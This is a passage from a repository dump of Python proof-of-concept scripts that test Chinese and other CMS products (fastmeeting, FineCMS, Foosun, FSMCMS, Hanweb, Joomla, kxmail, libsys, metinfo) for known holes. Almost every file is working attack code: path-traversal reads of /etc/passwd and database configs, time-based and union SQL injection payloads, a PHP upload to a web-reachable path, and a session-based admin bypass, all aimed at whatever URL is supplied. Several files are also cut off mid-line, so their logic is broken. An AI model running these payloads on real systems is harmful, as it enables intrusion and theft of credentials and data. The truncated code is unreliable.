36 | cprint("[+]存在eyou邮件系统信息泄露...(敏感信息)\tpayload: "+vulnurl, "green")
37 | else:
38 | cprint("[-]不存在eyou_weakpass漏洞", "white", "on_grey")
39 |
40 | except:
41 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
42 |
43 | if __name__ == "__main__":
44 | warnings.filterwarnings("ignore")
45 | testVuln = eyou_weakpass_BaseVerify(sys.argv[1])
46 | testVuln.run()
47 |
--------------------------------------------------------------------------------
/pocs/fastmeeting/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/fastmeeting/__init__.py
--------------------------------------------------------------------------------
/pocs/fastmeeting/fastmeeting_download_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 好视通视频会议系统(fastmeeting)任意文件遍历
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0143719
6 | author: Lucifer
7 | description: 文件/dbbackup/adminMgr/download.jsp中,参数fileName存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class fastmeeting_download_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml":
27 | cprint("[+]存在好视通视频会议系统(fastmeeting)任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在fastmeeting_download_filedownload漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = fastmeeting_download_filedownload_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/finecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/finecms/__init__.py
--------------------------------------------------------------------------------
/pocs/finecms/finecms_uploadfile.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: FineCMS免费版文件上传漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0105251
6 | author: Lucifer
7 | description: FineCMS上传页面无限制,可以上传任意文件。
8 | '''
9 | import sys
10 | import random
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class finecms_uploadfile_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "Content-Type":"application/oct",
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | payload = "/dayrui/libraries/Chart/ofc_upload_image.php?name="
25 | post_data = ''''''
26 | filename = "test" + str(random.randrange(1000,9999)) + ".php"
27 | vulnurl = self.url + payload + filename
28 | shellpath = self.url + "/dayrui/libraries/tmp-upload-images/"+filename
29 | try:
30 | req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
31 | req2 = requests.get(shellpath, headers=headers, timeout=10, verify=False)
32 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
33 | cprint("[+]存在FineCMS任意文件上传漏洞...(高危)\t\tpayload: "+shellpath, "red")
34 | else:
35 | cprint("[-]不存在finecms_uploadfile漏洞", "white", "on_grey")
36 |
37 | except:
38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = finecms_uploadfile_BaseVerify(sys.argv[1])
43 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/foosun/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/foosun/__init__.py
--------------------------------------------------------------------------------
/pocs/foosun/foosun_City_ajax_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Dotnetcms(风讯cms)SQL注入漏洞
5 | referer: https://silic.wiki/0day:%E9%A3%8E%E8%BF%85_dotnetcms_2.0-1.0_sql_injection
6 | author: Lucifer
7 | description: 文件City_ajax.aspx中,参数CityId存在SQL注入。
8 | '''
9 | import sys
10 | import time
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class foosun_City_ajax_sqli_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/user/City_ajax.aspx?CityId=1%27WAiTFoR%20DeLAy%20%270:0:6%27--"
24 | vulnurl = self.url + payload
25 | start_time = time.time()
26 | try:
27 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
28 | if time.time() - start_time >= 6:
29 | cprint("[+]存在Dotnetcms(风讯cms)SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
30 | else:
31 | cprint("[-]不存在foosun_City_ajax_sqli漏洞", "white", "on_grey")
32 |
33 | except:
34 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 |
36 | if __name__ == "__main__":
37 | warnings.filterwarnings("ignore")
38 | testVuln = foosun_City_ajax_sqli_BaseVerify(sys.argv[1])
39 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/fsmcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/fsmcms/__init__.py
--------------------------------------------------------------------------------
/pocs/fsmcms/fsmcms_columninfo_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: FSMCMS columninfo.jsp文件参数ColumnID SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0144330
6 | author: Lucifer
7 | description: 文件columninfo.jsp中,参数ColumnID存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class fsmcms_columninfo_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/fsmcms/cms/web/columninfo.jsp?ColumnID=-5/**/UnIoN/**/SeLeCt/**/1,2,Md5(1234),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在FSMCMS columninfo.jsp文件参数ColumnID SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在fsmcms_columninfo_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = fsmcms_columninfo_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/fsmcms/fsmcms_p_replydetail_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: fsmcms p_replydetail.jsp注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-065148
6 | author: Lucifer
7 | description: 文件/fsmcms/cms/leadermail/p_replydetail.jsp中,参数MailId存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class fsmcms_p_replydetail_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=-1%27UnIoN%20AlL%20SeLeCT%20NuLl%20NuLl%20NuLl%20NuLl%20Md5(1234)%20NuLl--%20"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在fsmcms SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在fsmcms_p_replydetail_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = fsmcms_p_replydetail_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/fsmcms/fsmcms_setup_reinstall.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: FSMCMS网站重装漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-043380
6 | author: Lucifer
7 | description: 东方文辉网站群内容管理系统FSMCMS网站重装漏洞,网站安装程序在安装之后默认没有删除,也没有限制,可以很容易的恶意把网站重装了。
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
14 | class fsmcms_setup_reinstall_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/setup/index.jsp"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if r'可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = fsmcms_setup_reinstall_BaseVerify(sys.argv[1])
38 | testVuln.run()
39 |
--------------------------------------------------------------------------------
/pocs/gowinsoft_jw/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/gowinsoft_jw/__init__.py
--------------------------------------------------------------------------------
/pocs/gowinsoft_jw/gowinsoft_jw_multi_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 金窗教务系统存在多处SQL注射漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0101234
6 | author: Lucifer
7 | description: 金窗教务系统多处SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class gowinsoft_jw_multi_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "%27AnD%201=CoNvErT(InT,(ChAr(71)%2BChAr(65)%2BChAr(79)%2BChAr(32)%2BChAr(74)%2BChAr(73)%2BChAr(64)%2B@@VeRsIon%20))%20AnD%20%27a%27=%27a"
23 | urls = ["/jiaoshi/shizi/shizi/textbox.asp?id=1",
24 | "/jiaoshi/sj/shixi/biyeshan1.asp?id=1",
25 | "/jiaoshi/sj/shiyan/xuankeda.asp?bianhao=1",
26 | "/jiaoshi/xueji/dangan/sdangangai1.asp?id=1",
27 | "/jiaoshi/xueji/shen/autobh.asp?jh=1"]
28 | vulnurl = self.url + payload
29 | noexist = True
30 | try:
31 | for turl in urls:
32 | vulnurl = self.url + turl + payload
33 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
34 | if r"GAO JI@Microsoft" in req.text:
35 | cprint("[+]存在金窗教务系统存在多处SQL注射漏洞...(高危)\tpayload: "+vulnurl, "red")
36 | noexist = False
37 | if noexist:
38 | cprint("[-]不存在gowinsoft_jw_multi_sqli漏洞", "white", "on_grey")
39 | except:
40 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
41 |
42 | if __name__ == "__main__":
43 | warnings.filterwarnings("ignore")
44 | testVuln = gowinsoft_jw_multi_sqli_BaseVerify(sys.argv[1])
45 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/hanweb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/hanweb/__init__.py
--------------------------------------------------------------------------------
/pocs/hanweb/hanweb_VerifyCodeServlet_install.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 大汉VerfiyCodeServlet越权漏洞
5 | referer: http://www.2cto.com/Article/201507/418593.html
6 | author: Lucifer
7 | description: /VerifyCodeServlet 可以 创建任意 SESSION的key值,opr_licenceinfo.jsp需要一个SESSION cookie_username 不为空,就可以成功登录。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class hanweb_VerifyCodeServlet_install_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | paths=['/vipchat/','/jcms/','/jsearch/','/jact/','/vc/','/xxgk/']
23 | payload = 'VerifyCodeServlet?var=cookie_username'
24 | adminpaths=['setup/opr_licenceinfo.jsp','setup/admin.jsp']
25 | sess = requests.Session()
26 | try:
27 | for path in paths:
28 | vulnurl=self.url+path+payload
29 | req = sess.get(vulnurl, headers=headers, timeout=10, verify=False)
30 | if req.status_code==200:
31 | for adminpath in adminpaths:
32 | adminurl=self.url+path+adminpath
33 | req2 = sess.get(adminurl, headers=headers, timeout=10, verify=False)
34 | if req2.status_code == 200 and ('Licence' in req2.text or 'admin' in req2.text):
35 | cprint("[+]存在大汉VerfiyCodeServlet越权漏洞...(高危)\tpayload: "+"1.先访问"+vulnurl+"\t2.再访问"+adminurl, "red")
36 |
37 | else:
38 | cprint("[-]不存在hanweb_VerifyCodeServlet_install漏洞", "white", "on_grey")
39 |
40 | except:
41 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
42 |
43 | if __name__ == "__main__":
44 | warnings.filterwarnings("ignore")
45 | testVuln = hanweb_VerifyCodeServlet_install_BaseVerify(sys.argv[1])
46 | testVuln.run()
47 |
--------------------------------------------------------------------------------
/pocs/hanweb/hanweb_downfile_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 大汉downfile.jsp 任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-092339
6 | author: Lucifer
7 | description: 文件/vc/vc/columncount/downfile.jsp中,参数filename存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class hanweb_downfile_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/vc/vc/columncount/downfile.jsp?savename=a.txt&filename=../../../../../../../../etc/passwd"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"root:" in req.text and r"/bin/bash" in req.text:
27 | cprint("[+]存在大汉downfile.jsp 任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在hanweb_downfile_filedownload漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = hanweb_downfile_filedownload_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/hanweb/hanweb_readxml_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 大汉版通JCMS数据库配置文件读取漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-046837
6 | author: Lucifer
7 | description: 大汉JCMS内容管理系统由于对文件读取时没有对文件路径进行过滤,导致可以直接直接读取数据库配置文件,
8 | 由于读取xml文件时没有对传进的参数进行过滤,flowcode参数可控,配置文件地址WEB-INF/config/dbconfig.xml,由于控制了文件后缀,只能读取xml文件。
9 |
10 | '''
11 | import sys
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class hanweb_readxml_fileread_BaseVerify():
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | payload = "/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig"
25 | vulnurl = self.url + payload
26 | try:
27 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
28 |
29 | if r"" in req.text:
30 | cprint("[+]存在大汉版通JCMS数据库读取漏洞...(高危)\tpayload: "+vulnurl, "red")
31 | else:
32 | cprint("[-]不存在hanweb_readxml_fileread漏洞", "white", "on_grey")
33 |
34 | except:
35 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
36 |
37 | if __name__ == "__main__":
38 | warnings.filterwarnings("ignore")
39 | testVuln = hanweb_readxml_fileread_BaseVerify(sys.argv[1])
40 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/joomla/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/joomla/__init__.py
--------------------------------------------------------------------------------
/pocs/joomla/joomla_com_docman_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla组件com_docman本地文件包含
5 | referer: https://www.exploit-db.com/exploits/37620
6 | author: Lucifer
7 | description: joomla组件com_docman 文件com_docman/dl2.php中参数file被base64解码后可造成文件包含漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class joomla_com_docman_lfi_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA="
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = joomla_com_docman_lfi_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/joomla/joomla_index_list_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla 3.7.0 core SQL注入
5 | referer: https://www.08sec.com/bobao/15167.html
6 | author: Lucifer
7 | description: joomla!3.7.0新引入的一个组件”com_fields“,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入.
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class joomla_index_list_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
27 | cprint("[+]存在joomla 3.7.0 core SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在joomla_index_list_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = joomla_index_list_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/kxmail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/kxmail/__init__.py
--------------------------------------------------------------------------------
/pocs/kxmail/kxmail_login_server_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 科信邮件系统login.server.php 时间盲注
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0122071
6 | author: Lucifer
7 | description: 文件prog/login.server.php中,参数xjxargs存在SQL注入。
8 | '''
9 | import sys
10 | import time
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class kxmail_login_server_sqli_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | payload = "/prog/login.server.php"
25 | vulnurl = self.url + payload
26 | post_data = {
27 | "xjxfun":"Function_PostLogin",
28 | "xjxr":"1434907361662",
29 | "xjxargs[]":"lo_osSWindows_NTlo_processorSlo_computernameSRD-HL-EMAILlo_user_agentSlo_ipS...lo_languageSuserSadmin139' AND(SELECT * FROM (SELECT(SLEEP(6)))taSu) AND 'dwkL'='dwkLdomainS...passwdSadminco_language_selectSco_sy_idS10random_picS5139random_numS240955"
30 | }
31 | start_time = time.time()
32 | try:
33 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
34 | if time.time() - start_time >= 6:
35 | cprint("[+]存在科信邮件系统login.server.php 时间盲注漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
36 | else:
37 | cprint("[-]不存在kxmail_login_server_sqli漏洞", "white", "on_grey")
38 |
39 | except:
40 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
41 |
42 | if __name__ == "__main__":
43 | warnings.filterwarnings("ignore")
44 | testVuln = kxmail_login_server_sqli_BaseVerify(sys.argv[1])
45 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/libsys/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/libsys/__init__.py
--------------------------------------------------------------------------------
/pocs/libsys/libsys_ajax_asyn_link_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_asyn_link.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-067400
6 | author: Lucifer
7 | description: 漏洞影响3.5,4.0,5.0版本,漏洞文件位于ajax_asyn_link.php中,参数url可以传入"../"来读取PHP文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class libsys_ajax_asyn_link_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | try:
20 | noexist = True
21 | for payload in [r"/zplug/ajax_asyn_link.php?url=../opac/search.php",
22 | r"/opac/zplug/ajax_asyn_link.php?url=../opac/search.php",
23 | r"/hwweb/zplug/ajax_asyn_link.php?url=../opac/search.php"]:
24 | vulnurl = self.url + payload
25 |
26 | req = requests.get(vulnurl, timeout=10, verify=False)
27 | if r"可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = libsys_ajax_asyn_link_fileread_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/libsys/libsys_ajax_asyn_link_old_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_asyn_link.old.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-059850
6 | author: Lucifer
7 | description: 漏洞影响5.0版本,漏洞文件位于ajax_asyn_link.old.php中,参数url可以传入"../"来读取配置文件,并成功登陆到后台。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class libsys_ajax_asyn_link_old_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"可能不存在漏洞", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = libsys_ajax_asyn_link_old_fileread_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/libsys/libsys_ajax_get_file_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_get_file.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0116255
6 | author: Lucifer
7 | description: 漏洞影响5.0版本,漏洞文件位于ajax_get_file.php中,参数filename可以传入"../"来读取配置文件,并成功登陆到后台。'''
8 | import sys
9 | import requests
10 | import warnings
11 | from termcolor import cprint
12 |
13 | class libsys_ajax_get_file_fileread_BaseVerify:
14 | def __init__(self, url):
15 | self.url = url
16 |
17 | def run(self):
18 | payload = "/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php"
19 | vulnurl = self.url + payload
20 | try:
21 | req = requests.get(vulnurl, timeout=10, verify=False)
22 |
23 | if r"可能不存在漏洞", "cyan")
30 |
31 | if __name__ == "__main__":
32 | warnings.filterwarnings("ignore")
33 | testVuln = libsys_ajax_get_file_fileread_BaseVerify(sys.argv[1])
34 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/metinfo/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/metinfo/__init__.py
--------------------------------------------------------------------------------
/pocs/metinfo/metinfo_getpassword_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: metinfo5.0 getpassword.php两处时间盲注漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-021062
6 | author: Lucifer
7 | description: member/getpassword.php与admin/admin/getpassword.php文件中,经过base64解码后的值用explode打散后进入到
8 | SQL语句引起注入。
9 | '''
10 | import sys
11 | import time
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class metinfo_getpassword_sqli_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | payloads = [r"/member/getpassword.php?lang=cn&p=MSdvcihzZWxlY3Qgc2xlZXAoNikpIy4x",
25 | r"/admin/admin/getpassword.php?lang=cn&p=MSdvcihzZWxlY3Qgc2xlZXAoNikpIy4x"]
26 |
27 | for payload in payloads:
28 | vulnurl = self.url + payload
29 | start_time = time.time()
30 |
31 | try:
